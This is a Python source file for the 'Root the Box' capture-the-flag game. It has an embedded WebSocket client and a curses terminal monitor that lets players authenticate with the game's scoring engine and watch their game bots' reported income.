BotMonitor.py | #!/usr/bin/env python3
"""
Created on Apr 23, 2012
@author: moloch
---------
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
---------
Linux/OSX only (well anything with curses really)
Small program used by teams to monitor their flags
For the sake of portability everything is in one file
"""
# pylint: disable=unused-variable
###################
# > Imports
###################
import os
import sys
import time
import json
import uuid
import array
import struct
import base64
import socket
import random
import hashlib
import logging
import argparse
import platform
import threading
from builtins import range, object, chr, str
from past.utils import old_div
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from datetime import datetime
from libs.StringCoding import encode
try:
import curses
import curses.panel
except ImportError:
sys.stdout.write("Error: Failed to import curses, platform not supported\n")
os._exit(2)
###################
# > Constants
###################
BUFFER_SIZE = 64
MIN_Y = 24
MIN_X = 80
###################
# > Defaults
###################
__version__ = "0.1.1"
__port__ = "8888"
__domain__ = "localhost"
__path__ = "/botnet/climonitor"
__log__ = "bot_monitor.log"
###################
# > Logging
###################
LOG_LEVELS = {
"notset": logging.NOTSET,
"debug": logging.DEBUG,
"info": logging.INFO,
"critical": logging.CRITICAL,
"warn": logging.WARN,
"error": logging.ERROR,
"fatal": logging.FATAL,
}
logger = logging.getLogger()
###################
# > Websockets
###################
"""
websocket python client.
=========================
This version support only hybi-13.
Please see http://tools.ietf.org/html/rfc6455 for protocol.
"""
# websocket supported version.
VERSION = 13
# closing frame status codes.
STATUS_NORMAL = 1000
STATUS_GOING_AWAY = 1001
STATUS_PROTOCOL_ERROR = 1002
STATUS_UNSUPPORTED_DATA_TYPE = 1003
STATUS_STATUS_NOT_AVAILABLE = 1005
STATUS_ABNORMAL_CLOSED = 1006
STATUS_INVALID_PAYLOAD = 1007
STATUS_POLICY_VIOLATION = 1008
STATUS_MESSAGE_TOO_BIG = 1009
STATUS_INVALID_EXTENSION = 1010
STATUS_UNEXPECTED_CONDITION = 1011
STATUS_TLS_HANDSHAKE_ERROR = 1015
class WebSocketException(Exception):
"""
websocket exception class.
"""
pass
class WebSocketConnectionClosedException(WebSocketException):
"""
If remote host closed the connection or some network error happened,
this exception will be raised.
"""
pass
default_timeout = None
traceEnabled = False
def enableTrace(traceable):
"""
turn on/off the traceability.
traceable: boolean value. if set True, traceability is enabled.
"""
global traceEnabled
traceEnabled = traceable
if traceable:
logger.setLevel(logging.DEBUG)
def setdefaulttimeout(timeout):
"""
Set the global timeout setting to connect.
timeout: default socket timeout time. This value is second.
"""
global default_timeout
default_timeout = int(timeout)
if default_timeout < 30:
default_timeout = 30
logging.info("Socket timeout set to: %d" % timeout)
def getdefaulttimeout():
"""
Return the global timeout setting(second) to connect.
"""
return default_timeout
def _parse_url(url):
"""
parse url and the result is tuple of
(hostname, port, resource path and the flag of secure mode)
url: url string.
"""
if ":" not in url:
raise ValueError("url is invalid")
scheme, url = url.split(":", 1)
parsed = urlparse(url, scheme="http")
if parsed.hostname:
hostname = parsed.hostname
else:
raise ValueError("hostname is invalid")
port = 0
if parsed.port:
port = parsed.port
is_secure = False
if scheme == "ws":
if not port:
port = 80
elif scheme == "wss":
is_secure = True
if not port:
port = 443
else:
raise ValueError("scheme %s is invalid" % scheme)
if parsed.path:
resource = parsed.path
else:
resource = "/"
if parsed.query:
resource += "?" + parsed.query
return (hostname, port, resource, is_secure)
def create_connection(url, timeout=None, **options):
"""
connect to url and return websocket object.
Connect to url and return the WebSocket object.
Passing optional timeout parameter will set the timeout on the socket.
If no timeout is supplied, the global default timeout setting returned by getdefaulttimeout() is used.
You can customize using 'options'.
If you set "header" dict object, you can set your own custom header.
>>> conn = create_connection("ws://echo.websocket.org/",
... header=["User-Agent: MyProgram",
... "x-custom: header"])
timeout: socket timeout time. This value is integer.
if you set None for this value, it means "use default_timeout value"
options: current support option is only "header".
if you set header as dict value, the custom HTTP headers are added.
"""
sockopt = options.get("sockopt", ())
websock = WebSocket(sockopt=sockopt)
actual_timeout = timeout is not None and timeout or default_timeout
logging.info("[Socket] Timeout: %d" % actual_timeout)
websock.settimeout(actual_timeout)
websock.connect(url, **options)
return websock
_MAX_INTEGER = (1 << 32) - 1
_AVAILABLE_KEY_CHARS = list(range(0x21, 0x2F + 1)) + list(range(0x3A, 0x7E + 1))
_MAX_CHAR_BYTE = (1 << 8) - 1
# ref. Websocket gets an update, and it breaks stuff.
# http://axod.blogspot.com/2010/06/websocket-gets-update-and-it-breaks.html
def _create_sec_websocket_key():
uid = uuid.uuid4()
return base64.encodestring(uid.bytes).strip()
_HEADERS_TO_CHECK = {"upgrade": "websocket", "connection": "upgrade"}
class _SSLSocketWrapper(object):
def __init__(self, sock):
self.ssl = socket.ssl(sock)
def recv(self, bufsize):
return self.ssl.read(bufsize)
def send(self, payload):
return self.ssl.write(payload)
_BOOL_VALUES = (0, 1)
def _is_bool(*values):
for v in values:
if v not in _BOOL_VALUES:
return False
return True
class ABNF(object):
"""
ABNF frame class.
see http://tools.ietf.org/html/rfc5234
and http://tools.ietf.org/html/rfc6455#section-5.2
"""
# operation code values.
OPCODE_TEXT = 0x1
OPCODE_BINARY = 0x2
OPCODE_CLOSE = 0x8
OPCODE_PING = 0x9
OPCODE_PONG = 0xA
# available operation code value tuple
OPCODES = (OPCODE_TEXT, OPCODE_BINARY, OPCODE_CLOSE, OPCODE_PING, OPCODE_PONG)
# opcode human readable string
OPCODE_MAP = {
OPCODE_TEXT: "text",
OPCODE_BINARY: "binary",
OPCODE_CLOSE: "close",
OPCODE_PING: "ping",
OPCODE_PONG: "pong",
}
# data length threshold.
LENGTH_7 = 0x7D
LENGTH_16 = 1 << 16
LENGTH_63 = 1 << 63
def __init__(
self, fin=0, rsv1=0, rsv2=0, rsv3=0, opcode=OPCODE_TEXT, mask=1, data=""
):
"""
Constructor for ABNF.
please check RFC for arguments.
"""
self.fin = fin
self.rsv1 = rsv1
self.rsv2 = rsv2
self.rsv3 = rsv3
self.opcode = opcode
self.mask = mask
self.data = data
self.get_mask_key = os.urandom
@staticmethod
def create_frame(data, opcode):
"""
create frame to send text, binary and other data.
data: data to send. This is string value(byte array).
if opcode is OPCODE_TEXT and this value is unicode,
data value is converted into unicode string, automatically.
opcode: operation code. please see OPCODE_XXX.
"""
if sys.version_info.major == 2:
instance = isinstance(data, unicode)
else:
instance = isinstance(data, str)
if opcode == ABNF.OPCODE_TEXT and instance:
data = encode(data, "utf-8")
# mask must be set if send data from client
return ABNF(1, 0, 0, 0, opcode, 1, data)
def format(self):
"""
format this object to string(byte array) to send data to server.
"""
if not _is_bool(self.fin, self.rsv1, self.rsv2, self.rsv3):
raise ValueError("not 0 or 1")
if self.opcode not in ABNF.OPCODES:
raise ValueError("Invalid OPCODE")
length = len(self.data)
if length >= ABNF.LENGTH_63:
raise ValueError("data is too long")
frame_header = chr(
self.fin << 7
| self.rsv1 << 6
| self.rsv2 << 5
| self.rsv3 << 4
| self.opcode
)
if length < ABNF.LENGTH_7:
frame_header += chr(self.mask << 7 | length)
elif length < ABNF.LENGTH_16:
frame_header += chr(self.mask << 7 | 0x7E)
frame_header += struct.pack("!H", length)
else:
frame_header += chr(self.mask << 7 | 0x7F)
frame_header += struct.pack("!Q", length)
if not self.mask:
return frame_header + self.data
else:
mask_key = self.get_mask_key(4)
return frame_header + self._get_masked(mask_key)
def _get_masked(self, mask_key):
s = ABNF.mask(mask_key, self.data)
return mask_key + "".join(s)
@staticmethod
def mask(mask_key, data):
"""
mask or unmask data. Just do xor for each byte
mask_key: 4 byte string(byte).
data: data to mask/unmask.
"""
_m = array.array("B", mask_key)
_d = array.array("B", data)
for i in range(len(_d)):
_d[i] ^= _m[i % 4]
return _d.tostring()
class WebSocket(object):
"""
Low level WebSocket interface.
This class is based on
The WebSocket protocol draft-hixie-thewebsocketprotocol-76
http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
We can connect to the websocket server and send/receive data.
The following example is a echo client.
>>> import websocket
>>> ws = websocket.WebSocket()
>>> ws.connect("ws://echo.websocket.org")
>>> ws.send("Hello, Server")
>>> ws.recv()
'Hello, Server'
>>> ws.close()
get_mask_key: a callable to produce new mask keys, see the set_mask_key
function's docstring for more details
sockopt: values for socket.setsockopt.
sockopt must be tuple and each element is argument of sock.setsockopt.
"""
def __init__(self, get_mask_key=None, sockopt=()):
"""
Initialize WebSocket object.
"""
self.connected = False
self.monitor = None
self.io_sock = self.sock = socket.socket()
for opts in sockopt:
self.sock.setsockopt(*opts)
self.get_mask_key = get_mask_key
def set_mask_key(self, func):
"""
set function to create musk key. You can customize mask key generator.
Mainly, this is for testing purpose.
func: callable object. the fuct must 1 argument as integer.
The argument means length of mask key.
This func must be return string(byte array),
which length is argument specified.
"""
self.get_mask_key = func
def settimeout(self, timeout):
"""
Set the timeout to the websocket.
timeout: timeout time(second).
"""
self.sock.settimeout(timeout)
def gettimeout(self):
"""
Get the websocket timeout(second).
"""
return self.sock.gettimeout()
def connect(self, url, **options):
"""
Connect to url. url is websocket url scheme. ie. ws://host:port/resource
You can customize using 'options'.
If you set "header" dict object, you can set your own custom header.
>>> ws = WebSocket()
>>> ws.connect("ws://echo.websocket.org/",
... header={"User-Agent: MyProgram",
... "x-custom: header"})
timeout: socket timeout time. This value is integer.
if you set None for this value,
it means "use default_timeout value"
options: current support option is only "header".
if you set header as dict value,
the custom HTTP headers are added.
"""
hostname, port, resource, is_secure = _parse_url(url)
# TODO: we need to support proxy
self.sock.connect((hostname, port))
if is_secure:
self.io_sock = _SSLSocketWrapper(self.sock)
self._handshake(hostname, port, resource, **options)
def _handshake(self, host, port, resource, **options):
sock = self.io_sock
headers = []
headers.append("GET %s HTTP/1.1" % resource)
headers.append("Upgrade: websocket")
headers.append("Connection: Upgrade")
if port == 80:
hostport = host
else:
hostport = "%s:%d" % (host, port)
headers.append("Host: %s" % hostport)
if "origin" in options:
headers.append("Origin: %s" % options["origin"])
else:
headers.append("Origin: http://%s" % hostport)
key = _create_sec_websocket_key()
headers.append("Sec-WebSocket-Key: %s" % key)
headers.append("Sec-WebSocket-Version: %s" % VERSION)
if "header" in options:
headers.extend(options["header"])
headers.append("")
headers.append("")
header_str = "\r\n".join(headers)
sock.send(header_str)
if traceEnabled:
logger.debug("--- request header ---")
logger.debug(header_str)
logger.debug("-----------------------")
status, resp_headers = self._read_headers()
if status != 101:
self.close()
raise WebSocketException("Handshake Status %d" % status)
success = self._validate_header(resp_headers, key)
if not success:
self.close()
raise WebSocketException("Invalid WebSocket Header")
self.connected = True
def _validate_header(self, headers, key):
for k, v in list(_HEADERS_TO_CHECK.items()):
r = headers.get(k, None)
if not r:
return False
r = r.lower()
if v != r:
return False
result = headers.get("sec-websocket-accept", None)
if not result:
return False
result = result.lower()
value = key + "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
hashed = base64.encodestring(hashlib.sha1(value).digest()).strip().lower()
return hashed == result
def _read_headers(self):
status = None
headers = {}
if traceEnabled:
logger.debug("--- response header ---")
while True:
line = self._recv_line()
if line == "\r\n":
break
line = line.strip()
if traceEnabled:
logger.debug(line)
if not status:
status_info = line.split(" ", 2)
status = int(status_info[1])
else:
kv = line.split(":", 1)
if len(kv) == 2:
key, value = kv
headers[key.lower()] = value.strip().lower()
else:
raise WebSocketException("Invalid header")
if traceEnabled:
logger.debug("-----------------------")
return status, headers
def send(self, payload, opcode=ABNF.OPCODE_TEXT):
"""
Send the data as string.
payload: Payload must be utf-8 string or unicode,
if the opcode is OPCODE_TEXT.
Otherwise, it must be string(byte array)
opcode: operation code to send. Please see OPCODE_XXX.
"""
frame = ABNF.create_frame(payload, opcode)
if self.get_mask_key:
frame.get_mask_key = self.get_mask_key
data = frame.format()
while data:
l = self.io_sock.send(data)
data = data[l:]
if traceEnabled:
logger.debug("send: " + repr(data))
def ping(self, payload=""):
"""
send ping data.
payload: data payload to send server.
"""
logging.debug("Got <- PING")
self.send(payload, ABNF.OPCODE_PING)
def pong(self, payload):
"""
send pong data.
payload: data payload to send server.
"""
logging.debug("Sending -> PONG")
self.monitor.pong = True
self.send(payload, ABNF.OPCODE_PONG)
def recv(self):
"""
Receive string data(byte array) from the server.
return value: string(byte array) value.
"""
opcode, data = self.recv_data()
return data
def recv_data(self):
"""
Receive data with operation code.
return value: tuple of operation code and string(byte array) value.
"""
while True:
frame = self.recv_frame()
if not frame:
# handle error:
# 'NoneType' object has no attribute 'opcode'
raise WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
return (frame.opcode, frame.data)
elif frame.opcode == ABNF.OPCODE_CLOSE:
self.send_close()
return (frame.opcode, None)
elif frame.opcode == ABNF.OPCODE_PING:
self.pong(frame.data)
def recv_frame(self):
"""
receive data as frame from server.
return value: ABNF frame object.
"""
header_bytes = self._recv_strict(2)
if not header_bytes:
return None
b1 = ord(header_bytes[0])
fin = b1 >> 7 & 1
rsv1 = b1 >> 6 & 1
rsv2 = b1 >> 5 & 1
rsv3 = b1 >> 4 & 1
opcode = b1 & 0xF
b2 = ord(header_bytes[1])
mask = b2 >> 7 & 1
length = b2 & 0x7F
length_data = ""
if length == 0x7E:
length_data = self._recv_strict(2)
length = struct.unpack("!H", length_data)[0]
elif length == 0x7F:
length_data = self._recv_strict(8)
length = struct.unpack("!Q", length_data)[0]
mask_key = ""
if mask:
mask_key = self._recv_strict(4)
data = self._recv_strict(length)
if traceEnabled:
received = header_bytes + length_data + mask_key + data
logger.debug("recv: " + repr(received))
if mask:
data = ABNF.mask(mask_key, data)
frame = ABNF(fin, rsv1, rsv2, rsv3, opcode, mask, data)
return frame
def send_close(self, status=STATUS_NORMAL, reason=""):
"""
send close data to the server.
status: status code to send. see STATUS_XXX.
reason: the reason to close. This must be string.
"""
if status < 0 or status >= ABNF.LENGTH_16:
raise ValueError("code is invalid range")
self.send(struct.pack("!H", status) + reason, ABNF.OPCODE_CLOSE)
def close(self, status=STATUS_NORMAL, reason=""):
"""
Close Websocket object
status: status code to send. see STATUS_XXX.
reason: the reason to close. This must be string.
"""
if self.connected:
if status < 0 or status >= ABNF.LENGTH_16:
raise ValueError("code is invalid range")
try:
self.send(struct.pack("!H", status) + reason, ABNF.OPCODE_CLOSE)
timeout = self.sock.gettimeout()
self.sock.settimeout(3)
try:
frame = self.recv_frame()
if logger.isEnabledFor(logging.ERROR):
recv_status = struct.unpack("!H", frame.data)[0]
if recv_status != STATUS_NORMAL:
logger.error("close status: " + repr(recv_status))
except:
pass
self.sock.settimeout(timeout)
self.sock.shutdown(socket.SHUT_RDWR)
except:
pass
self._closeInternal()
def _closeInternal(self):
self.connected = False
self.sock.close()
self.io_sock = self.sock
def _recv(self, bufsize):
bytes = self.io_sock.recv(bufsize)
if not bytes:
raise WebSocketConnectionClosedException()
return bytes
def _recv_strict(self, bufsize):
remaining = bufsize
bytes = ""
while remaining:
bytes += self._recv(remaining)
remaining = bufsize - len(bytes)
return bytes
def _recv_line(self):
line = []
while True:
c = self._recv(1)
line.append(c)
if c == "\n":
break
return "".join(line)
class WebSocketApp(object):
"""
Higher level of APIs are provided.
The interface is like JavaScript WebSocket object.
"""
def __init__(
self,
url,
header=None,
on_open=None,
on_message=None,
on_error=None,
on_close=None,
keep_running=True,
get_mask_key=None,
sockopt=(),
):
"""
url: websocket url.
header: custom header for websocket handshake.
on_open: callable object which is called at opening websocket.
this function has one argument. The argument is this class object.
on_message: callbale object which is called when received data.
on_message has 2 arguments.
The 1st argument is this class object.
The passing 2nd argument is utf-8 string which we get from the server.
on_error: callable object which is called when we get error.
on_error has 2 arguments.
The 1st argument is this class object.
The passing 2nd argument is exception object.
on_close: callable object which is called when closed the connection.
this function has one argument. The argument is this class object.
keep_running: a boolean flag indicating whether the app's main loop should
keep running, defaults to True
get_mask_key: a callable to produce new mask keys, see the WebSocket.set_mask_key's
docstring for more information
"""
self.url = url
self.header = header or []
self.on_open = on_open
self.on_message = on_message
self.on_error = on_error
self.on_close = on_close
self.keep_running = keep_running
self.get_mask_key = get_mask_key
self.sock = None
def send(self, data, opcode=ABNF.OPCODE_TEXT):
"""
send message.
data: message to send. If you set opcode to OPCODE_TEXT, data must be utf-8 string or unicode.
opcode: operation code of data. default is OPCODE_TEXT.
"""
if self.sock.send(data, opcode) == 0:
raise WebSocketConnectionClosedException()
def close(self):
"""
close websocket connection.
"""
self.keep_running = False
self.sock.close()
def run_forever(self, sockopt=()):
"""
run event loop for WebSocket framework.
This loop is infinite loop and is alive during websocket is available.
sockopt: values for socket.setsockopt.
sockopt must be tuple and each element is argument of sock.setsockopt.
"""
if self.sock:
raise WebSocketException("socket is already opened")
try:
self.sock = WebSocket(self.get_mask_key, sockopt=sockopt)
self.sock.settimeout(getdefaulttimeout())
self.sock.connect(self.url, header=self.header)
self.sock.monitor = self.monitor
self._run_with_no_err(self.on_open)
while self.keep_running:
data = self.sock.recv()
if data is None:
break
self._run_with_no_err(self.on_message, data)
except KeyboardInterrupt:
pass # Just close and exit
except Exception as e:
self._run_with_no_err(self.on_error, e)
finally:
self.sock.close()
self._run_with_no_err(self.on_close)
self.sock = None
def _run_with_no_err(self, callback, *args):
if callback:
try:
callback(self, *args)
except Exception as err:
if logger.isEnabledFor(logging.DEBUG):
logger.error(err)
###################
# > Time to Str
###################
def current_time():
""" Return current time as HH:MM:SS """
return time.strftime("%H:%M:%S")
###################
# > Opcodes
###################
def stop_animate_thread(ws):
""" Block until animation thread exits """
logging.info("Waiting for animation thread to exit ...")
ws.monitor.stop_thread = True
if ws.monitor.animate_thread is not None:
ws.monitor.animate_thread.join()
logging.info("All threads have joined")
ws.monitor.animate_thread = None
ws.monitor.stop_thread = False
def update(ws, message):
""" Recv and draw latest update """
logging.debug("Got update: %s" % message)
bots = []
for bot in message["bots"]:
bots.append((bot["box_name"], bot["remote_ip"], bot["total_reward"]))
ws.monitor.update_grid(bots)
def auth_failure(ws, message):
""" Failed to properly authenticate with scoring engine """
stop_animate_thread(ws)
logging.info("Authentication failure")
ws.monitor.auth_failure("ACCESS DENIED")
def auth_success(ws, message):
""" Successfully authenticated with scoring engine"""
stop_animate_thread(ws)
logging.info("Successfully authenticated")
thread = threading.Thread(target=ws.monitor.progress)
thread.start()
ws.monitor.animate_thread = thread
ws.monitor.__interface__()
def ping(ws, message):
ws.monitor.pong = True
OPCODES = {}
OPCODES["update"] = update
OPCODES["auth_success"] = auth_success
OPCODES["auth_failure"] = auth_failure
OPCODES["ping"] = ping
###################
# > WS Callbacks
###################
def on_open(ws):
""" Send auth when socket is open """
logging.info("Sending credentials to engine")
auth_msg = json.dumps(
{"opcode": "auth", "handle": ws.agent_name, "password": ws.password}
)
ws.send(auth_msg)
ws.monitor.stop_thread = False
def on_message(ws, message):
""" Parse message and call a function """
logging.debug("Recv'd message: %s" % str(message))
try:
response = json.loads(message)
if "opcode" not in response:
raise ValueError("Missing opcode")
elif response["opcode"] not in OPCODES:
raise ValueError("Invalid opcode")
else:
OPCODES[response["opcode"]](ws, response)
except ValueError:
ws.close()
def on_error(ws, error):
""" Error recv'd on WebSocket """
logging.exception("[WebSocket] on_error - %s" % type(error))
stop_animate_thread(ws)
if isinstance(error, socket.error):
ws.monitor.connection_problems()
elif isinstance(error, WebSocketException):
ws.monitor.connection_problems()
ws.monitor.stop()
def on_close(ws):
""" Websocket closed """
logging.debug("[WebSocket] Closing connection.")
stop_animate_thread(ws)
ws.monitor.stop("Connection lost")
###################
# > Bot Monitor
###################
class BotMonitor(object):
""" Manages all flags and state changes """
def __init__(self, connection_url):
self.url = connection_url
self.agent_name = None
self.password = None
self.total_income = 0
self.animate_thread = None
self.pong = False
def start(self):
""" Initializes the screen """
self.screen = curses.initscr()
self.__clear__()
curses.start_color()
curses.use_default_colors()
self.__colors__()
curses.noecho()
curses.cbreak()
curses.curs_set(0)
self.max_y, self.max_x = self.screen.getmaxyx()
self.screen.border(0)
self.screen.refresh()
self.__load__()
self.__connect__()
def stop(self, message=None):
""" Gracefully exits the program """
logging.debug("Stopping curses ui: %s" % message)
self.__clear__()
curses.endwin()
os._exit(0)
def connection_problems(self):
""" Display connection issue, and exit """
logging.fatal("Connection failure!")
self.auth_failure("CONNECTION FAILURE")
def __connect__(self):
""" Connect and authenticate with scoring engine """
ws = WebSocketApp(
self.url, on_message=on_message, on_error=on_error, on_close=on_close
)
ws.monitor = self
ws.agent_name = self.agent_name
ws.password = self.password
ws.on_open = on_open
self.animate_thread = threading.Thread(target=self.__connecting__)
self.stop_thread = False
self.animate_thread.start()
ws.run_forever()
def __connecting__(self):
""" Display connecting animation """
self.__clear__()
self.screen.refresh()
prompt = " Connecting, please wait ..."
connecting = curses.newwin(
3,
len(prompt) + 2,
(old_div(self.max_y, 2)) - 1,
(old_div((self.max_x - len(prompt)), 2)),
)
connecting.clear()
connecting.addstr(1, 1, prompt, curses.A_BOLD | curses.color_pair(self.CYAN))
connecting.refresh()
time.sleep(0.25)
while not self.stop_thread:
connecting.addstr(1, 1, " " * len(prompt))
connecting.refresh()
time.sleep(0.15)
connecting.addstr(
1, 1, prompt, curses.A_BOLD | curses.color_pair(self.CYAN)
)
connecting.refresh()
time.sleep(0.25)
connecting.endwin()
def __load__(self):
""" Loads all required data """
self.load_message = " Loading, please wait ... "
self.loading_bar = curses.newwin(
3,
len(self.load_message) + 2,
(old_div(self.max_y, 2)) - 1,
(old_div((self.max_x - len(self.load_message)), 2)),
)
self.loading_bar.border(0)
self.loading_bar.addstr(1, 1, self.load_message, curses.A_BOLD)
self.loading_bar.refresh()
time.sleep(0.5)
self.__credentials__()
self.loading_bar.clear()
def __interface__(self):
""" Main interface loop """
self.__redraw__()
self.screen.nodelay(1)
self.__title__()
self.__grid__()
self.__positions__()
self.screen.refresh()
def __title__(self):
""" Create title and footer """
title = " Root the Box: Botnet Monitor "
start_x = old_div((self.max_x - len(title)), 2)
self.screen.addstr(
0, start_x, title, curses.A_BOLD | curses.color_pair(self.BLUE)
)
self.screen.addstr(0, start_x - 1, "|", curses.A_BOLD)
self.screen.addstr(0, start_x + len(title), "|", curses.A_BOLD)
# Bottom bar
display_time = "[ %s ]" % current_time()
self.screen.addstr(
self.max_y - 1, (self.max_x - len(display_time)) - 3, display_time
)
self.screen.addstr(self.max_y - 1, 3, "[---]")
def __grid__(self):
""" Draws the grid layout """
pos_x, pos_y = 3, 3
self.screen.hline(2, 1, curses.ACS_HLINE, self.max_x - 2)
self.screen.hline(4, 1, curses.ACS_HLINE, self.max_x - 2)
# IP Address
self.ip_title = " IP Address "
self.screen.addstr(pos_y, 2, self.ip_title)
self.screen.vline(
pos_y, pos_x + len(self.ip_title), curses.ACS_VLINE, self.max_y - 4
)
# Box Name
pos_x += len(self.ip_title)
self.name_title = " Box Name "
self.screen.addstr(pos_y, pos_x + 1, self.name_title)
self.screen.vline(
pos_y, pos_x + len(self.name_title) + 1, curses.ACS_VLINE, self.max_y - 4
)
# Bot Income
pos_x += len(self.name_title)
self.income_title = " Bot Income "
self.screen.addstr(pos_y, pos_x + 2, self.income_title)
def __positions__(self):
""" Calculates starting x position for each column """
self.start_ip_pos = 2
self.start_name_pos = self.start_ip_pos + len(self.ip_title) + 3
self.start_income_pos = self.start_name_pos + len(self.name_title) + 1
def update_grid(self, boxes):
""" Redraw the grid with updated box information """
self.__interface__()
update_income = sum([box[2] for box in boxes])
self.total_income += update_income
self.__summary__(len(boxes), current_time())
start_row = 5
for index, box in enumerate(boxes):
self.screen.addstr(
start_row + index, self.start_ip_pos, "%d) %s" % (index + 1, box[0])
)
self.screen.addstr(start_row + index, self.start_name_pos, box[1])
if 0 < float(update_income):
percent = (old_div(float(box[2]), float(update_income))) * 100.0
income_string = "$%d (%.02d%s)" % (box[2], percent, "%")
else:
income_string = "$%d" % (box[2],)
self.screen.addstr(start_row + index, self.start_income_pos, income_string)
self.screen.refresh()
def __summary__(self, bot_count, update_time):
""" Addes total bots and update time """
start_pos = 3
pos_y = 1
self.screen.addstr(
pos_y, start_pos, "- Last Update: %s -" % update_time, curses.A_BOLD
)
bot_string = "$%d (%d bots)" % (self.total_income, bot_count)
bot_pos = self.max_x - (len(bot_string) + 3)
self.screen.addstr(pos_y, bot_pos, bot_string, curses.A_BOLD)
def __colors__(self):
""" Init colors pairs """
self.NO_COLOR = -1
self.RED = 1
curses.init_pair(self.RED, curses.COLOR_RED, self.NO_COLOR)
self.CYAN = 2
curses.init_pair(self.CYAN, curses.COLOR_CYAN, self.NO_COLOR)
self.WHITE_RED = 3
curses.init_pair(self.WHITE_RED, curses.COLOR_WHITE, curses.COLOR_RED)
self.BLUE = 4
curses.init_pair(self.BLUE, curses.COLOR_BLUE, self.NO_COLOR)
def __redraw__(self):
""" Redraw the entire window """
self.screen.clear()
self.screen.border(0)
self.screen.refresh()
def __clear__(self):
""" Clears the screen """
self.screen.clear()
self.screen.refresh()
def __credentials__(self):
""" Get display name from user """
self.stop_thread = False
thread = threading.Thread(target=self.__matrix__)
self.loading_bar.clear()
# Get agent name
prompt = "Account: "
self.agent_prompt = curses.newwin(
3,
len(self.load_message) + 2,
(old_div(self.max_y, 2)) - 1,
(old_div((self.max_x - len(self.load_message)), 2)),
)
self.agent_prompt.clear()
self.agent_prompt.border(0)
self.agent_prompt.addstr(1, 1, prompt, curses.A_BOLD)
curses.echo()
thread.start()
self.agent_name = self.agent_prompt.getstr(
1, len(prompt) + 1, len(self.load_message) - len(prompt) - 1
)
# Get password
curses.noecho()
prompt = "Password: "
self.agent_prompt = curses.newwin(
3, # Height
len(self.load_message) + 24, # Width
(old_div(self.max_y, 2)) - 1, # Start Y
(old_div((self.max_x - len(self.load_message)), 2)) - 12, # Start X
)
self.agent_prompt.border(0)
self.agent_prompt.addstr(1, 1, prompt, curses.A_BOLD)
self.password = self.agent_prompt.getstr(1, len(prompt) + 1, 64)
self.stop_thread = True
thread.join() # Wait for "Matrix" threads to stop
def __matrix__(self):
""" Displays really cool, pointless matrix like animation in the background """
# (2) Sat com animation
sat_com = " > Initializing sat com unit, please wait ... "
progress = ["|", "/", "-", "\\"]
for index in range(0, random.randint(50, 150)):
self.screen.addstr(2, 2, sat_com + progress[index % 4])
self.screen.refresh()
time.sleep(0.1)
if self.stop_thread:
return
self.screen.addstr(2, 2, sat_com + "success")
self.screen.refresh()
# (3) Uplink animation
download = " > Establishing satellite uplink: "
for index in range(5, 25):
signal = random.randint(0, 30)
self.screen.addstr(3, 2, download + str(signal) + " dBi ")
self.screen.refresh()
time.sleep(0.2)
if self.stop_thread:
return
self.screen.addstr(3, 2, download + "locked on")
self.screen.refresh()
# (4) Downloading animation
download = " > Downloading noki telcodes: "
for index in range(0, 100):
self.screen.addstr(4, 2, download + str(index) + "%")
self.screen.refresh()
time.sleep(0.1)
if self.stop_thread:
return
self.screen.addstr(4, 2, download + "complete")
self.screen.refresh()
# (5) Initializing memory address
memory = " > Initializing memory: "
for index in range(0, 2 ** 32, 2 ** 20):
time.sleep(0.02)
self.screen.addstr(5, 2, memory + str("0x%08X" % index))
self.screen.refresh()
if self.stop_thread:
return
self.screen.addstr(5, 2, memory + str("0x%08X -> 0xFFFFFFFF" % (0,)))
self.screen.refresh()
# (6) Matrix animation
matrix = " > The matrix has you ... follow the white rabbit "
for index in range(0, len(matrix)):
time.sleep(0.2)
self.screen.addstr(6, 2, matrix[:index])
self.screen.refresh()
if self.stop_thread:
return
def progress(self):
""" Progress animation, executed as separate thread """
index = 0
progress_bar = ["=--", "-=-", "--=", "-=-"]
pong_string = "PNG"
while not self.stop_thread:
if self.pong:
self.screen.addstr(self.max_y - 1, 3, "[")
self.screen.addstr(
self.max_y - 1, 4, pong_string, curses.color_pair(self.WHITE_RED)
)
self.screen.addstr(self.max_y - 1, 7, "]")
self.pong = False
else:
index += 1
progress_string = "[%s]" % (progress_bar[index % len(progress_bar)])
self.screen.addstr(self.max_y - 1, 3, progress_string)
display_time = "[ %s ]" % current_time()
self.screen.addstr(
self.max_y - 1, (self.max_x - len(display_time)) - 3, display_time
)
self.screen.refresh()
time.sleep(0.2)
def auth_failure(self, msg):
""" Display authentication failure message """
logging.info("Displaying auth failure message")
self.__clear__()
self.screen.refresh()
prompt = " *** %s *** " % msg
access_denied = curses.newwin(
3,
len(prompt) + 2,
(old_div(self.max_y, 2)) - 1,
(old_div((self.max_x - len(prompt)), 2)),
)
access_denied.addstr(1, 1, prompt, curses.A_BOLD | curses.color_pair(self.RED))
access_denied.refresh()
time.sleep(0.75)
for index in range(0, 5):
access_denied.addstr(1, 1, " " * len(prompt))
access_denied.refresh()
time.sleep(0.25)
access_denied.addstr(
1, 1, prompt, curses.A_BOLD | curses.color_pair(self.RED)
)
access_denied.refresh()
time.sleep(0.75)
self.stop()
###################
# > Main Entry
###################
def main(domain, port, secure, log_file, log_level):
""" Creates and starts the monitor """
hdlr = logging.FileHandler(log_file)
formatter = logging.Formatter("\r[%(levelname)s] %(asctime)s - %(message)s")
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
lvl = LOG_LEVELS.get(log_level, "notset")
logger.setLevel(lvl)
enableTrace(True)
if not secure:
url = "ws://%s:%s%s" % (domain, port, __path__)
else:
url = "wss://%s:%s%s" % (domain, port, __path__)
logging.info("Connecting to %s" % url)
bot_monitor = BotMonitor(url)
try:
bot_monitor.start()
except KeyboardInterrupt:
